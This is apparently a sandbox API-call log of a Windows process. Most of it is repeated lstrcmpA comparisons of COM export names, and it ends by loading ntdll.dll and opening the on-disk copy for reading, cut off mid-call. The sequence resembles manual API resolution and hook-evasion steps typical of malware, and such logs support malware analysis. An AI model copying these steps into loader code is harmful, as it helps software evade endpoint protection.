1 [0215.755] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.755] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.755] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0215.755] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0215.755] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0215.756] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0215.757] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0215.757] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0215.757] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0215.757] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0215.757] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0215.757] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0215.757] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0215.757] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0215.758] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0215.758] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0215.758] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0215.759] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0215.760] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0215.760] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0215.761] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0215.762] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0215.763] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0215.763] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0215.764] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0215.765] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0215.765] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0215.765] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0215.765] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0215.766] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0216.080] GetProcessHeap () returned 0x560000 [0216.080] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x4175040 | out: hHeap=0x560000) returned 1 [0216.086] GetProcessHeap () returned 0x560000 [0216.086] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579270 [0216.086] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0216.087] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0216.087] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0216.087] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0216.087] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 